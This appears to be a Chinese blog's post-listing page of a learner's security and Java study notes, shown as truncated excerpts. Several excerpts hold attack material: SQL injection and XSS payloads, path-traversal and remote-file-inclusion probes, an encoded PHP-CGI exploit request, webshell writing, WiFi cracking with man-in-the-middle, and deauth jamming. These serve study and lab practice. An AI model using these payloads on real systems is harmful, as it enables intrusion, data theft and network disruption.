- 博客(38)
- 资源 (6)
- 收藏
- 关注
原创 security+备考经验
经过一个月的艰苦奋斗,终于将security+拿到手,这门考试涉及面颇广,却都点到为止,但是对于了解安全整个行业的涉及面起到很大的作用。经过这次复习备考,我在巩固了渗透基础知识的同时,还掌握了企业中的安全产品实践、企业安全建设管理和密码学的知识,也算是“不虚此行”。下面分享一下我的备考经验,希望对后面的学员起到一些帮助。 首先,每次的直播课最好不要落,在听课前把这节课要上的内容先看一遍...
2018-08-06 16:09:33 387
原创 windows后门
1、打开记事本,输入下列文本:Windows Registry Editor Version 5.00[HKEY_CLASSES_ROOT\*\shell\runas]@="获取权限""NoWorkingDirectory"=""[HKEY_CLASSES_ROOT\*\shell\runas\command]@="cmd.exe /c takeown /f \"%1\" && i...
2018-07-04 11:42:52 961 1
原创 kali配置tor
https://www.torproject.org/download/download-easy.html.en#linux 下载tor浏览器解压后打开browser中的start配置文件,将if uid=0语句改为=1打开setup选择配置选择中国对应网桥开始连接配置完毕...
2018-06-11 10:00:03 4720
原创 iscc中的一道misc隐写杂项题WP
下载附件发现是个zip,里面还有个flag.txt,打开需要密码,看完题目,猜测是zip伪加密。 Zip文件由压缩源文件数据区、压缩源文件目录区、压缩源文件目录结束标志构成数据区:目录区:结束标志区:把zip丢进winhex:数据区的全局方式位标记和目录区的全局方式位标记都遭到修改,把它修改回00 00:保存。 Flag.txt直接打开了,发现里面有个字符串:“vfppjrnerpbzva”猜测是...
2018-05-14 22:29:30 1769
原创 破解wifi并实施中间人攻击
无线安全小组给的任务,自己搭实验环境完成一下~首先搭建环境,没有路由器就用手机热点装一下嘿嘿,设个密码zxcvbnm4567. 然后用win10主机做受害者,kali虚拟机做攻击者。 首先开始破解wifi,破解wifi呢有很多种方法:1.抓取握手包,用字典穷举破解,玄学破解法,要看字典强度和运气2.如果wifi开启了wps功能,可以穷举pin码的方式破解,成功率很高,但是很费时间!3....
2018-05-13 23:23:32 11005 2
原创 绕waf技巧之sql注入
waf,全名web application firewall,名为web应用防火墙,其实就是市面上的狗、锁、盾、神、宝等等。。可以保护主机、监控流量等。
2018-05-12 12:38:16 1549
原创 zip密码爆破脚本-----python3
import zipfilefrom threading import Threaddef extractFile(filename, password): try: filename.extractall(pwd=password.encode('utf-8')) print("密码找到,是:"+password) except: ...
2018-05-07 22:49:42 1496
原创 玄魂培训第一期ctf题实战
IP:10.9.0.201 先上nmap:PORT STATE SERVICE22/tcp open ssh3306/tcp open mysql7777/tcp open cbt8888/tcp open sun-answerbookMAC Address: 00:FF:18:CA:FB:2E (Unknown)Device type: bridge|general purpose...
2018-04-29 12:15:56 1804
原创 源IP隐藏后的寻找方法
国内网址ip会有cdn服务加速节点混淆源ip。也可能有盾机服务,让虚假ip映射到真实ip上,让你在信息收集阶段得到虚假ip,毫无疑问对渗透造成了很大的影响,列举以下方法找到真实ip:1.大部分cdn服务混淆ip只针对国内上网情况,所以使用国外dns服务器解析网站即可获得真实ip:(附国外dns服务列表:https://www.douban.com/group/topic/70892...
2018-04-25 22:59:37 1377
原创 sqlmap使用手册
get方式检查方法:sqlmap -u "网址" post方法检查方法:1.sqlmap -u "网址" --data "post参数=post数据"2.sqlmap -r x.txt 直接根据请求包注入,在请求包里每个消息头最后加*,就是添加对该信息头的注入cookie方式检测方法:sqlmap -u "网址" --cookie "cookie值"不同数据库注入方法:access数据库:判断...
2018-04-25 10:50:07 159
原创 个人渗透测试流程
七个阶段:第一阶段:前期交互阶段1.预估整体项目的时间周期2.确定ip和域名范围第二阶段:情报搜集1.确定版本信息2.出错信息3.端口扫描4.解析DNS服务器5.防御机制识别6.域名信息收集7.反向查询ip,子域名爆破,查找旁注目标第三阶段:危险建模1.分析可用的渗透代码和攻击载荷2.分析社会工程学对象第四阶段:漏洞分析1.web应用扫描器扫描(awvs、w3af、OWASP_ZPA等)2.服务器...
2018-04-23 12:00:14 3078
原创 利用esp-8266实现wifi攻击
0x00 前言之前在b站上看到这个wifi模块的攻击视频感觉挺有意思,就在某宝上入了一个拿回来玩玩0x01 外观转接头需要自己另外买0x03 编译程序https://anky.cc/esp8266-deauther-wifi-jammer/这里有教程,我用的是贴吧大神张馆长的固件http://tieba.baidu.com/p/50843537990x04 实验连上充电宝,打开手机wifi,连接设...
2018-04-19 11:15:28 25903 9
原创 sql注入漏洞
基于布尔的检测• 1’ and ‘1’=‘1 / 1’and ‘1 • 1’ and ‘1’=‘2 / 1’and ‘0看查询几个字段:• ‘ order by 9-- (-- )是查询字段联合查询:• ’ union select 1,2--+ 看第一个字段和第二个字段名称• ’ union all select database(),2--+Selec...
2018-04-13 15:32:20 543
原创 python写个端口扫描器
第一天接触socket模块,写个单线程端口扫描器from socket import *def portScan(ip,port): try: s=socket(AF_INET,SOCK_STREAM) result=s.connect_ex((ip,port)) if result==0: print("%d is open"...
2018-04-03 21:12:18 235
原创 xss漏洞
提交的内容被服务器原封不动的返回,则可能出现漏洞。Xss漏洞分为存储型、反射型、DOM型反射型:检测代码:<script> alert(‘XSS’); </script> 弹出一个警告窗口<a href='' onclick=alert('xss')>type</a> 建立一个点击,点击后弹出警告窗口<img src=htt...
2018-04-03 13:23:22 334
原创 java培训------知识补充
正则表达式:1,RegEx 正则表达式一. 模糊匹配^ .配输入字符串开始的位置。 $ 匹配输入字符串结尾的位置。* 最少出现0次,最多出现N次。+ 最少出现1次,最多出现N次。? 最少出现0次,最多出现1次。\d 匹配数字 :数字字符匹配。等效于 [0-9]。\D 匹配非数字 :非数字字符匹配。等效于 [^0-9]。\w 匹配数字+字母 :匹配任何字类字符...
2018-03-24 21:23:56 143
原创 java培训-----第五天
最后一天,写个万年历,不会打印出来,借鉴下同学的package figure_day4;import java.util.Scanner;public class test01 { public final static int YEAR4 = 365 * 3 + 366; public final static int YEAR = 365; public static void main(St...
2018-03-24 10:39:52 126
原创 java培训-----第四天
今天学爬虫:老师给的下图片的方法package com.kingswim.file;import java.io.BufferedInputStream;import java.io.ByteArrayOutputStream;import java.io.File;import java.io.FileOutputStream;import java.io.IOException;import ...
2018-03-24 10:28:59 225
原创 java培训-----第三天
homework:定义一“圆”Circle类,圆心为“点”Point类,构造一圆,求圆的周长和面积,并判断某点与圆的关系。定义圆类:public class circle { private point centPoint; private double radius; public final double PI=Math.PI; public circle(point centPoint,do...
2018-03-21 20:10:02 488
原创 java培训-------第二天
数组的定义: public static void main(String[] args) { // int arr1[] = {1,2,3,4}; //下标(索引) :[0,n-1] int[] arr = {12,45,98}; //第三个元素 int third= arr[2]; System.out.println(third); //数组的...
2018-03-20 20:45:36 132
原创 java培训--第一天
实现99乘法表:package figure_day1;public class test06 { public static void main(String[] args) { for(int i = 1;i < 10;i++){ for(int j = 1;j <= i;j++){ Sys...
2018-03-19 20:31:40 284
原创 web目标遍历和文件包含漏洞
配置靶机: → 重启apache服务:经典测试方法:•?file=../../../../etc/passwd •?page=file:///etc/passwd •?home=main.cgi •?page=http://www.a.com/1.php •http://1.1.1.1/../../../../dir/file.txt 绕过过滤检测方法部分服务器防御机制:在路径后面添加....
2018-03-08 13:00:30 2108
原创 docker安装及使用笔记
docker安装:sudo apt-get updatesudo apt-get -y install apt-transport-https ca-certificates curl software-properties-common# step 2: 安装GPG证书curl -fsSL http://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg ...
2018-03-07 22:59:41 306
原创 web身份认证漏洞
Session ID的利用:截取目标session ID利用firefox浏览器的tools > cookies manager功能导入IE获取session ID方法:F12开发人员工具>缓存 找回密码理想实验:https://www.example.com/reset?email=user@example.com&key=b4c9a289323b21a01c3e940f15...
2018-03-05 23:02:55 1691
原创 web默认安装漏洞
/phpmyadmin/setupPOST请求漏洞写入静态PHP木马:效果:写入PHP动态木马:(修改3.php)打开nc侦听端口:写入:(成功)Ubuntu/debian默认安装PHP5-cgi:POST/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E %63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%6...
2018-03-05 22:56:20 422
原创 Bursuite工具笔记
Target,proxy模块invisible代理 :针对多域名对应同一ip或者多ip对应同一域名情况代理https网站需要证书导入 :proxy ➡️ options ➡️ ca certificate ➡️ certificate in DER formate ➡️ next 保存的证书导入到浏览器中截断服务器返回客户端的数据包 :proxy➡️Options➡️interce...
2018-03-05 22:43:22 618
原创 skipfish学习笔记
skipfish -o test http://192.168.1.101/dvwa 对指定网站进行扫描并保存在test文件夹下skipfish -o test @url.txt 对txt文件内的域名进行扫描skipfish -A user:pass -o text http://192.168.1.
2018-01-23 00:33:29 295
原创 vega使用方法笔记
vega重点关注web application方面的代码漏洞,比如sql注入、跨站等sudo dhclient eth0 给metaspolitable重新获取ip地址 proxy模式:手工扒站 scanner模式:自动扒站 使用上面的useragent阻止浏览器缓存内容:增加流量,提高漏洞发现可能性记录所有请求;显示详细扫描信息编辑扫描模块
2017-12-25 23:18:03 5607
原创 nikto使用方法笔记
nikto -update 升级数据库和插件nikto -host 192.168.1.109 -port 80 指定host和端口号扫描nikto -host www.baidu.com -port 443 -ssl 扫描https网站nikto -host hosts.txt 扫描文本文件里的网站nmap -p80 192.168.1.0/24 -oG - | nikto -h
2017-12-24 00:54:54 10595 1
原创 metasploit魔鬼训练营第三天笔记
第一题:实验对象:freebufip:第二题:找到了robots文件:Google到登陆页面:存在sql注入漏洞账号:admin‘OR'1密码:test'OR'1拿到后台管理权限:第三题:可以考虑社会工程攻击第四题:第五题:openva
2017-12-13 17:41:24 399
原创 metasploit魔鬼训练营第二天笔记
下载书中所说的靶机,分配完网络地址用vmware打开后一直黑屏正在寻找解决办法清理磁盘碎片,没用导出为ovf,用vbox打开,没用重新换个资源下载,没用清空winsock,好了!!!啊啊啊啊气死开始配置!!!!!!bt5淘汰啦,把我vbox里的kali拷贝到vmware中:成功导入:配置owasp:配置win2
2017-12-12 00:45:33 421 1
原创 metasploit魔鬼训练营第一天笔记
实践题第一题时间线:* May 7, 2007: Initial defect disclosure to the security (at) samba (dot) org [email concealed]email alias.* May 7, 2007: Initial developer response by Sambadeveloper Gerald Carter
2017-12-10 22:11:06 808
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人